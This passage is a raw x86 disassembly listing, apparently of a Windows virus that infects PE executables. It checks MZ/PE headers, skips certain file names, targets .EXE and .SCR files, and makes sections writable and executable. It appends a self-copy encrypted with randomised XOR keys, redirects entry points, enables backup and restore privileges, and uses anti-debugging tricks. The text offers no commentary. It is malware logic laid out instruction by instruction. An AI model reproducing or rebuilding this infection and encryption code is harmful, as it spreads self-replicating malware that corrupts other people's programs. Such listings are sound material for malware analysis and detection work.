sub_3143B09A-F3j add eax, [ebp+1042A4h] cmp word ptr [eax], 25FFh jnz loc_3143B0C2 mov eax, [eax+2] sub eax, [ebx+34h] push eax call sub_3143A404 cmp [ebp+1042E4h], edi jnz loc_3143B0C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov eax, [eax] sub eax, [edi+0Ch] jb loc_3143B0C2 cmp eax, [edi+8] jnb loc_3143B0C2 loc_3143AFFE: ; CODE XREF: sub_3143B09A+22j add eax, 2 add eax, [edi+14h] add eax, [ebp+1042A4h] push edx push eax push dword ptr [ebp+104304h] call dword ptr [ebp+103E5Eh] pop edx test eax, eax jnz loc_3143B0D8 jmp loc_3143B0C2 ; --------------------------------------------------------------------------- loc_3143B026: ; CODE XREF: sub_3143B09A-11Cj cmp al, 0FFh jnz loc_3143B0C2 cmp byte ptr [esi], 15h jnz loc_3143B0C2 mov eax, [esi+1] sub eax, [ebx+34h] push eax call sub_3143A404 cmp [ebp+1042E4h], edi jnz short loc_3143B0C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov [ebp+104310h], eax mov eax, [eax] cmp eax, [ebp+104308h] jb short loc_3143B06F cmp eax, [ebp+10430Ch] jb short loc_3143B0D8 loc_3143B06F: ; CODE XREF: sub_3143B09A-35j cmp eax, 70000000h jb short loc_3143B0AD call sub_3143B09A lea ecx, [esi-4] mov eax, ecx sub eax, [edx] add eax, [edx+10h] cmp eax, [ebp+104310h] jnz short locret_3143B099 add esp, 10h push dword ptr [ecx] pop [esp-0Ch+arg_24] popa jmp short loc_3143B0B4 ; --------------------------------------------------------------------------- locret_3143B099: ; CODE XREF: sub_3143B09A-Fj retn ; END OF FUNCTION CHUNK FOR sub_3143B09A ; =============== S U B R O U T I N E ======================================= sub_3143B09A proc near ; CODE XREF: sub_3143B09A-24p var_8 = dword ptr -8 arg_0 = dword ptr 4 arg_24 = dword ptr 28h ; FUNCTION CHUNK AT 3143AF7B SIZE 0000011F BYTES pop dword ptr [ebp+1042C4h] pusha mov esi, [ebp+1042A4h] call sub_3143A50B popa loc_3143B0AD: ; CODE XREF: sub_3143B09A-26j test eax, 80000000h jnz short loc_3143B0C2 loc_3143B0B4: ; CODE XREF: sub_3143B09A-3j sub eax, [edi+0Ch] jb short loc_3143B0C2 cmp eax, [edi+8] jb loc_3143AFFE loc_3143B0C2: ; CODE XREF: sub_3143B09A-F9j ; sub_3143B09A-EBj ... dec ecx jnz loc_3143AF7B loc_3143B0C9: ; CODE XREF: sub_3143AEE1+9j ; UPX2:3143AF63j ... mov edi, [esp-4+arg_0] and dword ptr [edi+29B0h], 0FFBFFFFFh jmp short loc_3143B11A ; --------------------------------------------------------------------------- loc_3143B0D8: ; CODE XREF: sub_3143B09A-7Fj ; sub_3143B09A-2Dj or dword ptr [edx+24h], 0E0000060h dec esi xor eax, eax mov ecx, [esp+8+var_8] xchg eax, [ebp+1042F0h] mov [ebp+1042ECh], eax lea edi, [ecx+29B4h] add eax, [ebp+1042A4h] movsw movsd dec esi sub eax, esi add eax, [edx+14h] sub eax, [edx+0Ch] mov byte ptr [esi-5], 0E8h mov dword ptr [ecx+54h], 5 mov [esi-4], eax loc_3143B11A: ; CODE XREF: sub_3143B09A+3Cj pop edi pop esi retn sub_3143B09A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143B11D proc near ; CODE XREF: UPX2:3143B41Ep ; FUNCTION CHUNK AT 3143B247 SIZE 00000002 BYTES push edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jnz loc_3143B247 push eax push esp push 28h push 0FFFFFFFFh call dword ptr [ebp+103F0Ah] test eax, eax pop edi js loc_3143B247 call sub_3143959F call near ptr loc_3143B158+5 push ebx db 65h jz short near ptr unk_3143B196 imul ebp, [ebp+53h], 72756365h loc_3143B158: ; CODE XREF: sub_3143B11D+2Ap imul esi, [ecx+edi*2+41h], 78B5FF00h sub_3143B11D endp ; sp-analysis failed inc edx adc [eax], al call dword ptr [ebp+103E5Eh] mov [ebp+104280h], eax call near ptr loc_3143B18C+1 push ebx db 65h push esp popa imul esp, [ebp+4Fh], 77h outsb db 65h jb short loc_3143B1F3 push 72507069h imul esi, [esi+69h], 6567656Ch loc_3143B18C: ; CODE XREF: UPX2:3143B16Fp add [edi-18h], dl sub eax, ebp ; --------------------------------------------------------------------------- db 0FFh db 0FFh db 0E8h ; db 13h db 0 unk_3143B196 db 0 ; CODE XREF: sub_3143B11D+30j db 0 db 53h ; S db 65h ; e db 52h ; R db 65h ; e db 73h ; s db 74h ; t db 6Fh ; o db 72h ; r db 65h ; e db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0Bh db 0E8h ; db 0FFh db 0FFh db 0E8h ; db 12h db 0 db 0 db 0 db 53h ; S db 65h ; e db 42h ; B db 61h ; a db 63h ; c db 6Bh ; k db 75h ; u db 70h ; p db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0EEh ; db 0E7h ; db 0FFh db 0FFh db 0E8h ; db 18h db 0 db 0 db 0 db 53h ; S db 65h ; e db 43h ; C db 68h ; h db 61h ; a db 6Eh ; n db 67h ; g db 65h ; e db 4Eh ; N db 6Fh ; o db 74h ; t db 69h ; i db 66h ; f db 79h ; y db 50h ; P db 72h ; r db 69h ; i db 76h ; v db 69h ; i db 6Ch ; l db 65h ; e db 67h ; g db 65h ; e db 0 db 57h ; W db 0E8h ; db 0CBh ; db 0E7h ; db 0FFh db 0FFh db 50h ; P db 54h ; T ; --------------------------------------------------------------------------- loc_3143B1F3: ; CODE XREF: UPX2:3143B17Dj lea eax, [ebp+103DBCh] push 64h push eax push 1 push edi call dword ptr [ebp+103F16h] mov [esp], edi call dword ptr [ebp+103E52h] sub al, al lea edi, [ebp+104174h] push eax push eax push eax push dword ptr [ebp+103DBCh] push 40001h push esp push 1 push edi call dword ptr [ebp+104280h] push esp push 4 push edi call dword ptr [ebp+104280h] add esp, 14h push dword ptr [ebp+104278h] call dword ptr [ebp+103E8Eh] ; START OF FUNCTION CHUNK FOR sub_3143B11D loc_3143B247: ; CODE XREF: sub_3143B11D+Aj ; sub_3143B11D+1Fj pop edi retn ; END OF FUNCTION CHUNK FOR sub_3143B11D ; =============== S U B R O U T I N E ======================================= sub_3143B249 proc near ; CODE XREF: UPX2:3143B417p ; UPX2:3143B423p ... lea esi, [ebp+104174h] push esi call dword ptr [ebp+103E92h] cmp eax, 0FFFFFFFFh jz locret_3143B31A mov [ebp+104284h], eax push 0 push esi call dword ptr [ebp+103ECEh] test eax, eax jz locret_3143B31A sub eax, eax push eax push eax push 3 push eax push 1 push 0C0000000h push esi call dword ptr [ebp+103E6Eh] cmp eax, 0FFFFFFFFh jz loc_3143B89B mov [ebp+104288h], eax lea ecx, [ebp+10428Ch] lea edx, [ebp+104294h] push ecx push edx push 0 push eax call dword ptr [ebp+103E9Ah] cmp eax, 0FFFFFFFFh jz loc_3143B88F push 0 push dword ptr [ebp+104288h] call dword ptr [ebp+103E96h] cmp eax, 0FFFFFFFFh jz loc_3143B88F mov [ebp+10429Ch], eax xor ecx, ecx add eax, ebx push ecx push eax push ecx push 4 push ecx push dword ptr [ebp+104288h] call dword ptr [ebp+103E72h] test eax, eax jz loc_3143B88F xor ecx, ecx mov [ebp+1042A0h], eax push ecx push ecx push ecx push 0F001Fh push eax call dword ptr [ebp+103EBAh] test eax, eax jz loc_3143B867 mov [ebp+1042A4h], eax locret_3143B31A: ; CODE XREF: sub_3143B249+10j ; sub_3143B249+27j ... retn sub_3143B249 endp ; --------------------------------------------------------------------------- loc_3143B31B: ; CODE XREF: sub_3143B44B+188p ; sub_3143B44B+2A0p mov eax, 7317h mov ecx, [ebx+38h] ; --------------------------------------------------------------------------- db 0F7h ; db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- and [ebp+6], dh add eax, [ebp+101069h] xor edx, edx add eax, ecx div ecx mul ecx mov [ebp+1042B0h], eax mov eax, 29BBh mov ecx, [ebx+3Ch] add eax, [ebp+101069h] xor edx, edx add eax, ecx div ecx mul ecx mov [ebp+1042A8h], eax retn ; =============== S U B R O U T I N E ======================================= sub_3143B360 proc near ; CODE XREF: sub_3143B44B:loc_3143B4C0p ; sub_3143B44B+1B4p movzx ecx, word ptr [ebx+6] stc loc_3143B365: ; CODE XREF: sub_3143B360+23j jecxz short locret_3143B39C lea edx, [ebx+18h] movzx eax, word ptr [ebx+14h] add edx, eax dec ecx imul eax, ecx, 28h add edx, eax cmp dword ptr [edx], 6E69775Fh stc jz short locret_3143B39C cmp dword ptr [edx+0Ch], 1 jb short loc_3143B365 mov ecx, [ebx+3Ch] mov eax, [edx+14h] add eax, [edx+10h] lea eax, [eax+ecx*2-1] neg ecx and eax, ecx cmp eax, [ebp+10429Ch] locret_3143B39C: ; CODE XREF: sub_3143B360:loc_3143B365j ; sub_3143B360+1Dj ... retn sub_3143B360 endp ; =============== S U B R O U T I N E ======================================= sub_3143B39D proc near ; CODE XREF: UPX2:3143B435p arg_C = dword ptr 10h mov edx, [esp+arg_C] xor eax, eax pop dword ptr [edx+0B8h] retn sub_3143B39D endp ; sp-analysis failed ; --------------------------------------------------------------------------- loc_3143B3AA: ; CODE XREF: UPX2:3143B3CBj mov ecx, edi jmp short loc_3143B3B9 ; --------------------------------------------------------------------------- lea edi, [ebp+104174h] cld loc_3143B3B5: ; CODE XREF: UPX2:3143B3C7j mov ebx, edi xor ecx, ecx loc_3143B3B9: ; CODE XREF: UPX2:3143B3ACj ; UPX2:3143B3CFj lodsb cmp al, 61h jb short loc_3143B3C4 cmp al, 7Ah ja short loc_3143B3C4 sub al, 20h loc_3143B3C4: ; CODE XREF: UPX2:3143B3BCj ; UPX2:3143B3C0j stosb cmp al, 5Ch jz short loc_3143B3B5 cmp al, 2Eh jz short loc_3143B3AA cmp al, 0 jnz short loc_3143B3B9 jecxz short locret_3143B39C mov eax, [ecx] cmp eax, 455845h jz short loc_3143B3E7 cmp eax, 524353h jnz locret_3143B31A loc_3143B3E7: ; CODE XREF: UPX2:3143B3DAj mov eax, [ebx] cmp eax, 434E4957h jz locret_3143B31A cmp eax, 4E554357h jz locret_3143B31A cmp eax, 32334357h jz locret_3143B31A cmp eax, 4F545350h jz locret_3143B31A xor ebx, ebx call sub_3143B249 jnz short loc_3143B42E call sub_3143B11D call sub_3143B249 jz locret_3143B31A loc_3143B42E: ; CODE XREF: UPX2:3143B41Cj xor edx, edx call sub_3143B44B call sub_3143B39D call $+5 pop ebp sub ebp, 10343Fh jmp loc_3143B845 ; =============== S U B R O U T I N E ======================================= sub_3143B44B proc near ; CODE XREF: UPX2:3143B430p var_14 = dword ptr -14h push dword ptr fs:[edx] mov esi, [ebp+1042A4h] mov fs:[edx], esp cmp word ptr [esi], 5A4Dh jnz loc_3143B845 mov ebx, [esi+3Ch] add ebx, esi cmp word ptr [ebx], 4550h jnz loc_3143B845 test dword ptr [ebx+16h], 2000h jnz loc_3143B845 test byte ptr [ebx+5Ch], 2 jz loc_3143B845 mov eax, [ebx+8] cmp eax, 0A0A0A0A0h jz loc_3143B845 cmp eax, 20202020h jz loc_3143B845 mov ecx, [ebx+0C8h] jecxz short loc_3143B4C0 push ecx call sub_3143A404 add ecx, [ebp+1042E8h] add ecx, esi and dword ptr [ecx+40h], 0 and dword ptr [ecx+44h], 0 loc_3143B4C0: ; CODE XREF: sub_3143B44B+5Dj call sub_3143B360 jb loc_3143B845 and dword ptr [ebp+1042ECh], 0 mov eax, [edx+8] mov ecx, [edx+10h] sub eax, ecx jnb short loc_3143B4E0 xor eax, eax jmp short loc_3143B4E5 ; --------------------------------------------------------------------------- loc_3143B4E0: ; CODE XREF: sub_3143B44B+8Fj add ecx, eax mov [edx+10h], ecx loc_3143B4E5: ; CODE XREF: sub_3143B44B+93j mov [ebp+1042ACh], eax add ecx, [edx+0Ch] mov eax, 10000h push ecx call near ptr dword_31439B40+43h xor [ebp+1039AEh], dl mov cl, 20h xor [ebp+1039AFh], dh loc_3143B507: ; CODE XREF: sub_3143B44B+D5j push 20h dec cl pop eax js short loc_3143B522 call near ptr dword_31439B40+43h test edx, edx setz dl shl edx, cl xor [ebp+1039B0h], edx jmp short loc_3143B507 ; --------------------------------------------------------------------------- loc_3143B522: ; CODE XREF: sub_3143B44B+C1j test dword ptr [ebp+1039B0h], 2000000h jz short loc_3143B550 test dword ptr [ebp+1039B0h], 3 jnz short loc_3143B546 and dword ptr [ebp+1039B0h], 0F7FFFFFFh jmp short loc_3143B550 ; --------------------------------------------------------------------------- loc_3143B546: ; CODE XREF: sub_3143B44B+EDj or dword ptr [ebp+1039B0h], 10000000h loc_3143B550: ; CODE XREF: sub_3143B44B+E1j ; sub_3143B44B+F9j ... push 6 pop ecx loc_3143B556: ; CODE XREF: sub_3143B44B+129j push 6 pop eax call near ptr dword_31439B40+43h mov al, [ebp+1039A8h] xchg al, [edx+ebp+1039A8h] mov [ebp+1039A8h], al loop loc_3143B556 test dword ptr [ebp+1039B0h], 8 jnz short loc_3143B58B cmp byte ptr [ebp+1039AAh], 1 jz short loc_3143B550 loc_3143B58B: ; CODE XREF: sub_3143B44B+135j test dword ptr [ebp+1039B0h], 10000000h jz short loc_3143B5B2 cmp byte ptr [ebp+1039A8h], 5 jz short loc_3143B550 cmp byte ptr [ebp+1039A9h], 5 jz short loc_3143B550 cmp byte ptr [ebp+1039AAh], 5 jz short loc_3143B550 loc_3143B5B2: ; CODE XREF: sub_3143B44B+14Aj test dword ptr [ebp+1039B0h], 400000h jz short loc_3143B5C7 cmp byte ptr [ebp+1039A8h], 2 ja short loc_3143B550 loc_3143B5C7: ; CODE XREF: sub_3143B44B+171j and dword ptr [ebp+1042F0h], 0 call loc_3143A845 call loc_3143B31B call sub_3143B84E mov ebx, [ebp+1042A8h] add ebx, [ebp+1042ACh] call sub_3143B249 jz loc_3143B845 mov esi, [ebp+1042A4h] mov ebx, [esi+3Ch] add ebx, esi call sub_3143B360 jb loc_3143B845 or dword ptr [edx+24h], 0E0000060h mov edi, esi push edx push esi add edi, [edx+14h] add edi, [edx+10h] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_3143B63B mov [ebp+1042F4h], edi lea esi, [ebp+1039BCh] mov ecx, [ebp+101069h] rep movsb loc_3143B63B: ; CODE XREF: sub_3143B44B+1DAj push edi mov ecx, 0A6Fh lea esi, [ebp+101000h] rep movsd mov cl, 0 jecxz short loc_3143B64F rep movsb loc_3143B64F: ; CODE XREF: sub_3143B44B+200j test dword ptr [ebp+1039B0h], 20000000h jz loc_3143B70D push dword ptr [ebx+28h] call sub_3143A404 mov edx, [ebp+1042E4h] test edx, edx jz loc_3143B70D mov esi, [ebp+1042A4h] mov ecx, [edx+10h] or dword ptr [edx+24h], 0E0000060h sub ecx, [edx+8] jnb short loc_3143B68C xor ecx, ecx loc_3143B68C: ; CODE XREF: sub_3143B44B+23Dj add esi, [edx+14h] cmp ecx, [ebp+101069h] mov ecx, [ebp+101069h] jb short loc_3143B6F3 mov edi, [esp+14h+var_14] and dword ptr [ebp+101069h], 0 and dword ptr [edi+69h], 0 mov edi, [edx+8] add [edx+8], ecx add esi, edi xchg esi, edi mov eax, [ebp+1042B8h] test dword ptr [ebp+1039B0h], 40h jz short loc_3143B6CC neg dword ptr [eax] loc_3143B6CC: ; CODE XREF: sub_3143B44B+27Dj add esi, [edx+0Ch] sub [eax], esi mov [ebp+1042F0h], esi mov esi, [ebx+28h] add [eax], esi test dword ptr [ebp+1039B0h], 40h jz short loc_3143B6EA neg dword ptr [eax] loc_3143B6EA: ; CODE XREF: sub_3143B44B+29Bj push ecx call loc_3143B31B pop ecx jmp short loc_3143B6FF ; --------------------------------------------------------------------------- loc_3143B6F3: ; CODE XREF: sub_3143B44B+250j add esi, [ebx+28h] sub esi, [edx+0Ch] push ecx push esi rep movsb pop edi pop ecx loc_3143B6FF: ; CODE XREF: sub_3143B44B+2A6j lea esi, [ebp+1039BCh] mov [ebp+1042F4h], edi rep movsb loc_3143B70D: ; CODE XREF: sub_3143B44B+20Ej ; sub_3143B44B+224j pop edi pop esi rdtsc xchg eax, edx lea eax, [edi+137h] cmp dl, [ebp+1039AEh] jnz short loc_3143B726 imul edx, 12345678h loc_3143B726: ; CODE XREF: sub_3143B44B+2D3j mov [eax-19h], dx call sub_31439120 pop edx mov ecx, [edx+0Ch] add ecx, [edx+10h] test dword ptr [ebp+1039B0h], 20000000h lea eax, [ecx+5] jnz short loc_3143B758 mov [ebp+1042F0h], ecx add eax, [ebp+101069h] and dword ptr [edi+69h], 0 loc_3143B758: ; CODE XREF: sub_3143B44B+2F8j sub eax, [ebx+28h] mov [edi+54h], eax test dword ptr [ebp+103F6Ch], 1 jz short loc_3143B774 mov dword ptr [ebx+8], 0A0A0A0A0h loc_3143B774: ; CODE XREF: sub_3143B44B+320j test dword ptr [ebp+1039B0h], 400000h jz short loc_3143B787 push edx call sub_3143AEE1 pop edx loc_3143B787: ; CODE XREF: sub_3143B44B+333j mov ecx, [ebp+1042F0h] jecxz short loc_3143B794 mov [ebx+28h], ecx jmp short loc_3143B7A1 ; --------------------------------------------------------------------------- loc_3143B794: ; CODE XREF: sub_3143B44B+342j mov ecx, [ebp+1042ECh] jecxz short loc_3143B79E jmp short loc_3143B7A1 ; --------------------------------------------------------------------------- loc_3143B79E: ; CODE XREF: sub_3143B44B+34Fj mov ecx, [ebx+28h] loc_3143B7A1: ; CODE XREF: sub_3143B44B+347j ; sub_3143B44B+351j test dword ptr [ebp+1039B0h], 3 jz short loc_3143B7C1 mov eax, [ebp+1042F4h] add ecx, [ebp+1042DCh] add eax, [ebp+1042D8h] add [eax], ecx loc_3143B7C1: ; CODE XREF: sub_3143B44B+360j mov ecx, [edx+10h] mov eax, [ebp+1042A8h] cmp [edx+8], ecx jnb short loc_3143B7D2 mov [edx+8], ecx loc_3143B7D2: ; CODE XREF: sub_3143B44B+382j add [edx+10h], eax and dword ptr [ebx+58h], 0 mov eax, [ebp+1042B0h] push 29BCh add [edx+8], eax pop ecx add [ebx+50h], eax mov dl, [ebp+1039AEh] test dword ptr [ebp+1039B0h], 20000000h jz short loc_3143B803 add ecx, [ebp+101069h] loc_3143B803: ; CODE XREF: sub_3143B44B+3B0j mov dh, 0 test dword ptr [ebp+1039B0h], 20000h jnz short loc_3143B825 inc dh test dword ptr [ebp+1039B0h], 40000h jnz short loc_3143B825 mov dh, [ebp+1039AFh] loc_3143B825: ; CODE XREF: sub_3143B44B+3C4j ; sub_3143B44B+3D2j test dword ptr [ebp+1039B0h], 4000h jnz short loc_3143B83C loc_3143B831: ; CODE XREF: sub_3143B44B+3EDj mov al, [edi] add al, dl stosb add dl, dh loop loc_3143B831 jmp short loc_3143B845 ; --------------------------------------------------------------------------- loc_3143B83C: ; CODE XREF: sub_3143B44B+3E4j ; sub_3143B44B+3F8j mov al, [edi] xor al, dl stosb add dl, dh loop loc_3143B83C loc_3143B845: ; CODE XREF: UPX2:3143B446j ; sub_3143B44B+11j ... xor edx, edx mov esp, fs:[edx] pop dword ptr fs:[edx] pop eax sub_3143B44B endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3143B84E proc near ; CODE XREF: sub_3143B44B+18Dp cmp dword ptr [ebp+104288h], 0 jz locret_3143B31A push dword ptr [ebp+1042A4h] call dword ptr [ebp+103EDEh] loc_3143B867: ; CODE XREF: sub_3143B249+C5j push dword ptr [ebp+1042A0h] call dword ptr [ebp+103E52h] lea ecx, [ebp+10428Ch] lea edx, [ebp+104294h] push ecx push edx push 0 push dword ptr [ebp+104288h] call dword ptr [ebp+103ED2h] loc_3143B88F: ; CODE XREF: sub_3143B249+6Bj ; sub_3143B249+82j ... push dword ptr [ebp+104288h] call dword ptr [ebp+103E52h] loc_3143B89B: ; CODE XREF: sub_3143B249+45j lea esi, [ebp+104174h] push dword ptr [ebp+104284h] push esi call dword ptr [ebp+103ECEh] and dword ptr [ebp+104288h], 0 retn sub_3143B84E endp ; --------------------------------------------------------------------------- dw 0E8h dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104174B5h dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah dd 0E8001039h, 0FFFFE0B3h, 4C261h, 2070103h, 0FBCD0506h dd 7AB9C4FBh, 119415FFh, 0FF8B0100h ; --------------------------------------------------------------------------- cld stc push ebp mov ebp, esp call sub_3143B9DB clc call loc_3143BA88 xchg ebx, ebx cld clc mov ebp, 0 nop jmp loc_3143BA2D ; =============== S U B R O U T I N E ======================================= sub_3143B9DB proc near ; CODE XREF: UPX2:3143B9C1p push dword ptr fs:0 xor dword ptr ds:loc_31428214+1, ebp mov fs:0, esp xor eax, eax push eax push eax push eax push 10000h push 10h push eax push eax push 4000h push eax push 4 push eax push eax push eax call ds:dword_31428090 ; GetProcAddress xor eax, eax push eax push eax push eax push 80000000h push eax push 80000000h push eax push eax push eax push eax push eax call ds:dword_31428090 ; GetProcAddress loc_3143BA2D: ; CODE XREF: UPX2:3143B9D6j stc mov ecx, [ebp-8] mov fs:0, ecx xchg ebx, ebx stc clc stc nop call sub_3143BA83 xchg ebx, ebx nop nop sub edx, 0FFFF7286h xor ebx, ebx or ebx, 2A97h jmp short $+2 and ecx, 0 add ecx, 0D5h push edx stc mov edx, edx loc_3143BA63: ; CODE XREF: sub_3143B9DB+9Bj mov al, [edx] clc xor ax, cx mov [edx], al cld jmp short $+2 add edx, 1 dec ebx cld stc or ebx, ebx jnz short loc_3143BA63 pop edx jmp short $+2 leave clc jmp edx sub_3143B9DB endp ; --------------------------------------------------------------------------- jmp short $+2 jmp short $+2 ; =============== S U B R O U T I N E ======================================= sub_3143BA83 proc near ; CODE XREF: sub_3143B9DB+62p pop edx cmc push edx retn sub_3143BA83 endp ; --------------------------------------------------------------------------- stc loc_3143BA88: ; CODE XREF: UPX2:3143B9C7p mov edx, [esp+10h] xor eax, eax pop dword ptr [edx+0B8h] ; --------------------------------------------------------------------------- dd 0EFh dup(0) dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 126h dup(0) dd offset loc_31439000 dd 1341h dup(0) ; --------------------------------------------------------------------------- loc_31441000: ; DATA XREF: UPX2:314442F8o call $+5 cld mov eax, [esp] mov ecx, [eax+29ABh] mov [eax+32F3h], ebx and ecx, 400000h mov ebx, [esp+4] jz short loc_3144104D pop ecx mov [eax+32F7h], esi mov cl, [eax+29AFh] mov [eax+32FBh], edi cmp cl, 0E8h jz short loc_31441041 mov ebx, [eax+29B1h] jmp short loc_3144104B ; --------------------------------------------------------------------------- loc_31441041: ; CODE XREF: UPX2:31441037j mov ecx, [eax+29B0h] mov ebx, [ecx+ebx+2] loc_3144104B: ; CODE XREF: UPX2:3144103Fj mov ebx, [ebx] loc_3144104D: ; CODE XREF: UPX2:3144101Fj push ebp mov ebp, eax sub dword ptr [esp+4], 18E05h sub ebp, 101005h mov edi, [esp+4] lea esi, [ebp+1039BCh] mov ecx, 0E3h rep movsb sldt cx test ecx, ecx jnz short loc_3144107B or eax, 0FFFFFFFFh int 2Eh ; DOS 2+ internal - EXECUTE COMMAND ; DS:SI -> counted CR-terminated command string loc_3144107B: ; CODE XREF: UPX2:31441074j and ebx, 0FFFFF000h loc_31441081: ; CODE XREF: UPX2:31441090j cmp dword ptr [ebx+4Eh], 73696854h jz short loc_31441092 loc_3144108A: ; CODE XREF: UPX2:3144109Fj sub ebx, 100h jnz short loc_31441081 loc_31441092: ; CODE XREF: UPX2:31441088j mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_3144108A add edx, ebx mov esi, [edx+20h] mov ecx, [edx+18h] add esi, ebx push ecx loc_314410AC: ; CODE XREF: UPX2:loc_314410C0j lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_314410C0 cmp dword ptr [eax+5], 6441636Fh jz short loc_314410C5 loc_314410C0: ; CODE XREF: UPX2:314410B5j loop loc_314410AC pop ecx jmp short loc_314410F0 ; --------------------------------------------------------------------------- loc_314410C5: ; CODE XREF: UPX2:314410BEj sub [esp], ecx mov esi, [edx+24h] pop ecx add esi, ebx movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+101137h] lea ecx, [ebp+101120h] mov dx, [eax-19h] call ecx jmp short loc_31441137 ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3144117E loc_314410F0: ; CODE XREF: UPX2:314410C3j ; sub_3144117E+10j ... mov eax, [ebp+1039B0h] and eax, 400000h jz short loc_3144111C lea esi, [ebp+1039B4h] lodsd mov edi, [esp+arg_0] stosd mov ebx, [ebp+1042F8h] movsb mov edi, [ebp+104300h] mov esi, [ebp+1042FCh] loc_3144111C: ; CODE XREF: sub_3144117E-83j pop ebp retn ; END OF FUNCTION CHUNK FOR sub_3144117E ; --------------------------------------------------------------------------- retf 5394h ; CODE XREF: sub_3144344B+2DFp ; --------------------------------------------------------------------------- mov ecx, 2879h mov ebx, edx loc_31441128: ; CODE XREF: UPX2:31441133j xor [eax], dl sub dl, bl add eax, 1 xchg bl, bh xchg dl, dh loop loc_31441128 pop ebx retn ; --------------------------------------------------------------------------- loc_31441137: ; CODE XREF: UPX2:314410EEj call near ptr loc_31441146+2 inc ebx insb outsd jnb short near ptr loc_314411A3+3 dec eax popa outsb db 64h insb loc_31441146: ; CODE XREF: UPX2:loc_31441137p add gs:[ebx-1], dl setalc mov [ebp+103E52h], eax call near ptr loc_31441162+1 inc ebx jb short loc_314411BE popa jz short near ptr loc_314411C0+1 inc ebp jbe short near ptr loc_314411C0+4 outsb jz short loc_314411A3 loc_31441162: ; CODE XREF: UPX2:31441151p add [ebx-1], dl setalc mov [ebp+103E56h], eax call sub_3144117E inc edi db 65h jz short near ptr loc_314411C0+1 popa jnb short near ptr loc_314411EA+2 inc ebp jb short near ptr loc_314411EA+3 outsd jb short $+2 ; =============== S U B R O U T I N E ======================================= sub_3144117E proc near ; CODE XREF: UPX2:3144116Cp arg_0 = dword ptr 4 ; FUNCTION CHUNK AT 314410F0 SIZE 0000002E BYTES ; FUNCTION CHUNK AT 31441524 SIZE 0000000B BYTES push ebx call esi ; lstrcatA mov [ebp+103E5Ah], eax call sub_3144154F test eax, eax jz loc_314410F0 push eax call dword ptr [ebp+103E5Ah] test eax, eax jnz loc_31441524 loc_314411A3: ; CODE XREF: UPX2:31441160j ; UPX2:3144113Fj cmp byte ptr [ebp+10152Fh], 1 jnz short loc_314411C0 push dword ptr [ebp+1042F8h] dec byte ptr [ebp+10152Fh] pop dword ptr [ebp+101588h] loc_314411BE: ; CODE XREF: UPX2:31441157j jmp short loc_314411C7 ; --------------------------------------------------------------------------- loc_314411C0: ; CODE XREF: sub_3144117E+2Cj ; UPX2:3144115Aj ... and dword ptr [ebp+101588h], 0 loc_314411C7: ; CODE XREF: sub_3144117E:loc_314411BEj and dword ptr [ebp+101578h], 0 and dword ptr [ebp+10157Ch], 0 and dword ptr [ebp+101580h], 0 push edi mov byte ptr [ebp+1012D4h], 1 mov [ebp+103E5Eh], esi loc_314411EA: ; CODE XREF: UPX2:31441176j ; UPX2:31441179j lea esi, [ebp+1015F4h] xor ecx, ecx lea edi, [ebp+103E6Ah] mov cl, 20h call sub_3144158C pop edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jz loc_314412E3 mov eax, [edi+14h] push 40h add eax, ebx push 8001000h mov [ebp+103E62h], eax push 7318h push 0 call dword ptr [ebp+103EE2h] test eax, eax jz loc_31441524 xchg eax, edi lea esi, [ebp+101000h] mov ebp, edi mov ecx, 0CC6h sub ebp, 101000h lea edx, [ebp+101254h] rep movsd jmp edx ; --------------------------------------------------------------------------- sub esp, 20h mov edi, esp push 8 xor eax, eax pop ecx lea edx, [ebp+101B3Dh] rep stosd mov edi, esp mov [edi+10h], edx inc byte ptr [edi+1Ch] push edi push 10003h call dword ptr [ebp+103E62h] add esp, 20h test eax, eax jz loc_31441524 xchg eax, edi push 0 push 1 push 80000400h push 10000h call dword ptr [ebp+103E62h] test eax, eax jz loc_31441524 push 0 push eax push 40000h push 0 shr eax, 0Ch push edi push 1 push eax push 10001h call dword ptr [ebp+103E62h] push 1000Ah call dword ptr [ebp+103E62h] call loc_314412D3 jmp loc_31441524 ; --------------------------------------------------------------------------- loc_314412D3: ; CODE XREF: sub_3144117E+14Bp ; sub_3144117E+162j push 1 pop ecx jecxz short locret_314412E2 push 0Ah call dword ptr [ebp+103ED6h] jmp short loc_314412D3 ; --------------------------------------------------------------------------- locret_314412E2: ; CODE XREF: sub_3144117E+158j retn ; --------------------------------------------------------------------------- loc_314412E3: 